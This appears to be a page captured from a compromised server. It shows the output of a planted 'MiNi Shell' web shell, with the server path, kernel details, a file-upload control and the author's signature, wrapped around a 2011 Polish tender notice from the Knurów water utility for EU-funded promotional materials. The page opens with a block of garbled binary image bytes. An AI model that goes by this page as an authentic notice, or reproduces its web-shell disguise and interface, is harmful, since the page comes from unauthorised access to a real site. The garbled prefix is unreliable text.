JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110602/140786-N-2011.html

<p class="kh_header"><b>Knurów: Dostawa materiałów promocyjnych Projektu pn.: Porządkowanie gospodarki ściekowej Gminy Knurów - budowa i przebudowa systemów kanalizacyjnych</b><br>
<b>Numer ogłoszenia: 140786 - 2011; data zamieszczenia: 02.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Wodociągów i Kanalizacji spółka z o.o. , ul. Szpitalna 11, 44-194 Knurów, woj. śląskie, tel. 032 3300150, 3300168, faks 032 3300169.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwik.knurow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sektor wodny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów promocyjnych Projektu pn.: Porządkowanie gospodarki ściekowej Gminy Knurów - budowa i przebudowa systemów kanalizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów promocyjnych dla Projektu pn. Porządkowanie gospodarki ściekowej Gminy Knurów - budowa i przebudowa systemów kanalizacyjnych.<br>
2.	Zamawiający podzielił zamówienie na trzy części:<br>
1)	CZĘŚĆ 1 - materiały promocyjne;<br>
2)	CZEŚĆ 2 - materiały promocyjne wykonane zgodnie z opracowanymi i przedstawionymi przez Zamawiającego projektami;<br>
3)	CZĘŚĆ 3 - kalendarz na rok 2012.<br>
3.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części III SIWZ.<br>
4.	Zamawiający dopuszcza składanie ofert częściowych.<br>
5.	Wykonawca może złożyć według swojego wyboru ofertę na jedną lub dwie lub wszystkie części zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 39.29.41.00-0, 30.19.97.92-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pwik.knurow.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PWiK sp. z o.o. w Knurowie, ul. Szpitalna 11, 44 - 194 Knurów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2011 godzina 10:00, miejsce: siedziba Zamawiającego w Knurowie, ul. Szpitalna 11, pokój nr 1 (Biuro Podawcze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Priorytet I Programu Operacyjnego Infrastruktura i Środowisko.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> materiały reklamowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UWAGA! Zamawiający żąda dołączenia do oferty próbki wszystkich materiałów opisanych niżej w ilości jednej sztuki każdego z materiałów. Próbki dołączone do oferty muszą spełniać wszelkie wymagania określone w opisie przedmiotu zamówienia, za wyjątkiem oznakowania. Wymagane przez Zamawiającego oznakowanie, zgodnie z opisem przedmiotu zamówienia, Wykonawca obowiązany będzie umieścić na dostarczanych materiałach promocyjnych w ramach realizacji umowy zawartej w wyniku niniejszego postępowania.
Koszt przygotowania i dostarczenia próbek ponosi Wykonawca. Zamawiający zwróci na wniosek Wykonawcy, którego oferta nie została wybrana, złożone przez niego próbki.<br>
Niżej przedstawiono zestawienie ilościowe poszczególnych materiałów składających się na Część 1 niniejszego zamówienia. Ponadto opisano sposób oznakowania oraz podano specyfikację każdego materiału. 
Oferowane materiały promocyjne muszą być fabrycznie nowe. 
Termin wykonania zamówienia  -  Wykonawca dostarczy materiały promocyjne oznakowane zgodnie z poniższym opisem w ilościach podanych niżej do siedziby Zamawiającego w terminie do 30 dni od daty zawarcia umowy.
Oznakowanie materiałów promocyjnych musi być zgodne z Zasadami promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013 wydanymi przez Ministerstwo Rozwoju Regionalnego. Zasady promocji dostępne są na stronie internetowej  www.pois.gov.pl<br>

Lp.	Nazwa	Ilość (szt.)	Opis  <br>
1	Torba ekologiczna bawełniana	szt. 500	<br>
Oznakowanie: 
Nadruk jednostronny metodą naprasowanki lub sitodruku wykonany wg wzoru przedstawionego w projekcie  1:<br>
1 strona - nadruk:  nazwa Projektu, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej), informacja o współfinansowaniu Projektu ze środków UE, duże logo Zamawiającego, dane teleadresowe Zamawiającego,<br>
2 strona - bez nadruku<br>
Specyfikacja:<br>
Surowiec : surówka bawełniana 105 g/m2 +/- 5 g; szerokość: 38 cm +/- 2 mm; wysokość 43,5 cm +/- 2 mm; dno nie usztywniane o wym. 10 cm x 27,5 cm; uszy bawełniane o długości 33 cm, wszyte w bok torby. Torba z jednym przedziałem głównym. 
Wizualizacja - projekt 1<br>
2	Długopis 	szt. 500	<br> Oznakowanie: 
Grawer z dwóch stron długopisu oraz na klipsie: 1 strona długopisu: nazwa Projektu, 2 strona długopisu: ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej), klips: adres strony internetowej Zamawiającego.<br>
Specyfikacja: <br>
Długopis wykonany z aluminium pokrytego lakierowaną powłoką w kolorze niebieskim, wyposażony w metalowy klips w kolorze srebrnym.
Waga: 25 g; długość: przedział 14 - 16 cm; o ok. 1 - 1,5 cm; kolor wkładu: niebieski; typ wkładu: Elite - wymienny; odblokowanie wkładu przez wciśniecie; tworzywo: aluminium
Wizualizacja - projekt 2<br>
3	Ołówek automatyczny	szt. 500	<br> Oznakowanie:
Grawer z dwóch stron ołówka i na klipsie: 1 strona ołówka: nazwa Projektu; 2 strona ołówka: ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej), klips: adres strony internetowej Zamawiającego.<br>
Specyfikacja:<br>
Ołówek automatyczny wykonany z aluminium pokrytego lakierowaną powłoką w kolorze niebieskim wkład o średnicy 0,5 mm, wyposażony w 1 wkład, gumkę i przyciskowy mechanizm wysuwania wkładu.
Wizualizacja - projekt 3<br>
4	Taśma do mierzenia	szt. 100	<br> Oznakowanie:
Grawer na metalowej płytce- nazwa Projektu, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej), adres strony internetowej Zamawiającego.<br>
Specyfikacja:<br>
Długość: 75 mm; szerokość: 26 mm; szerokość taśmy: 16 mm; długość taśmy: 2 m; waga łączna 181.00 g. Odporna na rdzę, automatyczne zwijanie taśmy z przyciskiem zatrzymania, podziałka stopniowana w milimetrach, obudowa z plastiku ABS, rozciągana pętla.
Wizualizacja- projekt 4 <br>
5	Pen driver	szt. 600	<br> Oznakowanie:
Grawer dwustronny - 1 strona: logo Projektu, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej); 2 strona : adres strony internetowej Zamawiającego<br>
Specyfikacja:<br>
Pen driver wyposażony w wysuwany mechanizm i kółko do mocowania ; wymiary: 59 mm x 20 mm x 12 mm; waga: 9 gram, pojemność 2 GB; materiał wierzchni: metal w kolorze niebieskim i srebrnym (szarym). 
Wizualizacja - projekt 5<br>
6	Parasole - damskie i męskie	szt. 200 (100 damskich i 100 męskich)<br>	Oznakowanie:
Nadruk termotransfer kolor biały na dwóch panelach parasola:
1 panel- nazwa Projektu, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej)
2 panel - adres strony internetowej Zamawiającego<br>
Specyfikacja:<br>
Parasol męski automatyczny (sprężynowy mechanizm otwierania), jednokolorowy, czarny, pokrycie- nylon lub równoważny, długość 86 cm, o 105 cm . Drewniana rękojeść, metalowa konstrukcja - 8 drutów, pasek spinający na rzep.
Parasol damski automatyczny (sprężynowy mechanizm otwierania), jednokolorowy, granatowy, pokrycie- nylon lub równoważny, długość 86 cm, o 105 cm . Drewniana rękojeść , metalowa konstrukcja - 8 drutów, pasek spinający na rzep.
Wizualizacja - projekt 6<br>
7	Teczka ze skóry naturalnej  z kieszonkami i klipsem
VIP1	szt. 20	<br> Oznakowanie:
Grawer na klipsie metalowym znajdującym się na okładce- logo Projektu, adres strony internetowej Zamawiającego, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej).<br>
Specyfikacja:<br>
Teczka ze skóry naturalnej w kolorze czarnym, zamykana na suwak, wymiary 335x250 x max 45 mm. Wyposażenie minimalne: blok A4 w kratkę, 50 stron bez dodatkowego nadruku, kalkulator,2 komory formatu A4 ,3 miejsca  na  karty wizytowe, miejsce na długopis - uchwyt wykonany ze skóry naturalnej.
Na wierzchu  teczki ozdobny klips metalowy, na którym znajdzie się grawer zgodnie z wytycznymi odnośnie oznakowania.
Teczka pakowana osobno w pudełko kartonowe.
Wizualizacja- projekt 7 <br>
8	Teczka z materiału skóropodobnego  z kieszonkami i klipsem
VIP2	szt. 60	<br> Oznakowanie:
Grawer na klipsie metalowym znajdującym się na okładce - logo Projektu, adres strony internetowej Zamawiającego, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej).<br>
Specyfikacja:<br>
Teczka wykonana ze skóry ekologicznej w kolorze czarnym, zapinana na suwak, wymiary 335x250 x max 45 mm., 
Wyposażenie minimalne: blok A4 w kratkę, 50 stron bez dodatkowego nadruku, kalkulator,2 komory formatu A4 ,3 miejsca  na  karty wizytowe, miejsce na długopis - uchwyt wykonany materiału skóropodobnego. 
Na wierzchu  teczki ozdobny klips metalowy, na którym znajdzie się grawer zgodnie z wytycznymi odnośnie oznakowania.
Teczka pakowana osobno w pudełko kartonowe.
Wizualizacja- projekt 8 <br>
9	Zestawy piśmienniczy VIP 1	szt. 20	<br> Oznakowanie:
Sitodruk kolor szary lub grafit na pudełku kartonowym, w którym dostarczony zostanie zestaw:
nazwa Projektu, adres strony internetowej Zamawiającego, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej) <br>
Specyfikacja:<br>
Komplet piśmienniczy w kolorze czarnym wraz z ekskluzywnym etui pokrytym skórą naturalną. Pióro wieczne wysokiej jakości i długopis (otwierany przez przekręcenie: metalowy wkład cienko piszący kolorze niebieskim o grubości 0,3 - max 0,4 mm), umieszczone w etui ze skóry  naturalnej w kolorze czarnym . Pióro i długopis wykonane z metalu lub materiału wyższej jakości. Dodatkowo całość umieszczona w eleganckim pudełku wykonanym z kartonu ozdobnego oznakowanym j.w.
Wizualizacja - projekt 9<br>
10	Zestaw piśmienniczy VIP 2	szt. 60 <br>	Oznakowanie:
Grawer na metalowej płytce umieszczonej na etui : nazwa Projektu, adres strony internetowej Zamawiającego, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej).<br>
Specyfikacja:<br>
Kolor pióra i długopisu: czarny, kolor etui: czarny. Pióro i długopis wykonane z aluminium lub materiału wyższej jakości. Długopis otwierany przez przekręcenie: wkład cienko piszący w kolorze niebieskim o grubości 0,3 mm. Pióro kulkowe wkład niebieski, rozszerzane w środkowej części . Opakowane w eleganckie etui z materiału skóropodobnego w kolorze czarnym.
Wizualizacja - projekt 10 <br>
11	Brelok metalowy - otwieracz	szt. 500	<br> Oznakowanie:
Grawer laserowy w odcieniach szarości (kolor uzależniony od mocy lasera); nazwa Projektu, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej), adres strony internetowej Zamawiającego.<br>
Specyfikacja:<br>
Metalowy brelok z otwieraczem do butelek w kolorze srebrnym, wymiary 8,4 x 3,5 x 0,5 cm , wielkość graweru 30 mm x 12 mm.
Wizualizacja - projekt 11<br>
12	Filiżanka z opakowaniem	szt. 200	<br> Oznakowanie:
Sitodruk kolor szary lub grafit na pudełku kartonowym, w którym dostarczony zostanie zestaw zgodnie z projektem 12:
nazwa Projektu, adres strony internetowej Zamawiającego, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej)<br>
Specyfikacja:<br>
Komplet ceramiczny: filiżanka + spodek, w kolorze białym. Filiżanka zwężana ku dołowi, o okrągłym przekroju: pojemność ok. 210 ml, wysokość  73 mm, średnica 85/50 mm . Spodek okrągły: średnica ok. 155 mm .Każdy komplet w opakowaniu jednostkowym, tj. w pudełku kartonowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> materiały promocyjne wykonane zgodnie z opracowanymi i przedstawionymi przez Zamawiającego projektami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca wykona opisane niżej materiały promocyjne zgodnie z  projektami opracowanymi i przedstawionymi przez Zamawiającego. Ponadto w przypadku tablicy ozdobnej do obowiązków Wykonawców będzie należał także montaż tablicy na terenie siedziby Zamawiającego.
Zamawiający po zawarciu umowy niezwłocznie dostarczy Wykonawcy projekty poniższych materiałów w wersji elektronicznej.
Termin wykonania zamówienia- Wykonawca wykona materiały promocyjnymi zgodnie z projektami, przekazanymi przez Zamawiającego i dostarczy je w ilościach podanych niżej do siedziby Zamawiającego w terminie do 45 dni od daty zawarcia umowy, z wyłączeniem kalendarza trójdzielnego, który należy wykonać i dostarczyć do 15 października 2011 r.<br>
Lp.	Nazwa	Ilość (szt.)	Opis  <br>
1	Notes A5	szt. 500	Wykonanie i oznakowanie :
Zgodnie z projektem 1.
Specyfikacja:
Notes firmowy, klejony, format A5, kolor 4+0, offset 80 g, 100 kartek w bloczku. Kartki wykonane wg projektu 1.
Okładka wykonana zgodnie z projektem 1, kolor 4+0, offset 250 g. Plecki 350g.<br>
2	Papierowa teczka z miejscem na CD 	szt. 1500	Wykonanie i oznakowanie:
Zgodnie z projektem 2.
Specyfikacja:
4+0, papier: 300 g, lakier mat., bigowana, klejone skrzydełko, wklejona plastikowa kieszeń na CD, nadruk na przedniej stronie teczki, tylnej stronie teczki i skrzydełkach, teczka na dokumenty formatu A4 , pojemność na 100 kartek, grzbiet teczki o grubości 1 cm.
Wykrojnik wg wzoru dostarczonego przez Zamawiającego.<br>
3	Ulotka- mapa projektu	szt. 5 000	Wykonanie i oznakowanie:
Zgodnie z projektem 3.
Specyfikacja:
Format A4 składane do DL, kolor 4+4, offset120 g, papier kredowy.<br>
4	Kalendarz trójdzielny  na rok 2012 	szt. 100	Wykonanie i oznakowanie
Zgodnie z projektem 4.
Specyfikacja:
Każdy kalendarz pakowany w osobną kopertę.
Wymiary kalendarza: 315 x 765 mm.
Główka kalendarza:<br>
- wymiar: 325 x 195 mm<br>
- ilość kolorów: 4 + 0 (pełny kolor)<br>
- zabezpieczona lakierem UV<br>
-oprawiana na tekturze z efektem wypukłości (kaszerowana)<br>
Plecki (spód kalendarza)<br>
- papier: karton 350 g/m2<br>
- miejsce na nadruk związany z Projektem<br>
5	Tablica ozdobna	szt. 1	Wykonanie i oznakowanie:
Zgodnie z projektem 5.
Specyfikacja:
Tablica zewnętrzna o wymiarach : wysokość 1,68 m, szerokość 2,5 m, materiał pleksi. Umocowana na słupkach metalowych, wykonana z trwałego materiału w technologii odpornej na działanie warunków atmosferycznych (deszcz, śnieg, słońce, wiatr) Dane techniczne tablicy:<br>
- pylon dwustronny (grafika z dwóch stron);<br>
- profile zewnętrzne aluminiowe anodowane;<br>
-profile wewnętrzne stalowe wzmacniające konstrukcję 100 x 50 mm;<br>
- wypełnienie płytą pleksi;<br>
- wymiary płyty reklamowej 150 x 200 cm;<br>
- wymiary całej konstrukcji: 168 x 250 cm;<br>
- wydruk wielkoformatowy, lakierowany<br>
Do obowiązków Wykonawcy będzie należał także montaż tablicy na terenie siedziby Zamawiającego.<br>
6	Torebka prezentowa	szt. 200	Oznakowanie:
Zgodne z projektem 6.
Specyfikacja:
Foliowana, 29,5 x 21 cm, górny brzeg usztywniony i wzmocniony. Uchwyt z plecionego sznurka wykonanego z tworzywa sztucznego, całkowita długość uchwytu - 22 cm. Bok 29,5 cm x 10 cm. Dno usztywnione o wym. 10 cm x 21 cm. Nadruk 4 +4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kalendarz na rok 2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kalendarze na rok 2012 muszą być nowe oraz o parametrach nie niższych pod względem jakości i parametrów technicznych niż opisane przez Zamawiającego w poniżej.
Termin wykonania zamówienia - Wykonawca dostarczy kalendarze oznakowane zgodnie z poniższym opisem i w ilości  podanej niżej do siedziby Zamawiającego do 15 października 2011 r.
Oznakowanie kalendarzy musi być zgodne z Zasadami promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013 wydanymi przez Ministerstwo Rozwoju Regionalnego. Zasady promocji dostępne są na stronie internetowej www.pois.gov.pl <br>
Lp.	Nazwa	Ilość (szt.)	Opis  <br>
1	Kalendarze na rok 2012 format B5 szt. 100	<br> Oznakowanie:
Tłoczenie dwustronne na okładce kalendarza zgodnie z projektem 1:
jedna strona: logo Zamawiającego,
druga strona: nazwa Projektu, ciąg znaków (logo Programu Operacyjnego Infrastruktura i Środowisko, logo Zamawiającego, flaga Unii Europejskiej).<br>
Specyfikacja:<br>
- format B5 <br>
- okładka skóropodobna, zmiękczona gąbką, w kolorze granatowym,<br>
- papier chamois lub równoważny,<br>
- tydzień na dwóch stronach,<br>
- oznaczenie dni tygodnia, świąt oraz imienin w języku polskim,<br>
- dni świąteczne w kolorze odróżniającym od dni powszednich,<br>
- wszystkie święta zaznaczone w kalendarium muszą być świętami obchodzonymi w Polsce,<br>
- notatnik teleadresowy (zintegrowany z blokiem),<br>
- wycięty register,<br>
- kolorowa wkładka informacyjna (w tym mapy Polski, Europy) min. 4 strony,<br>
Wizualizacja - Projekt 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 30.19.97.92-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com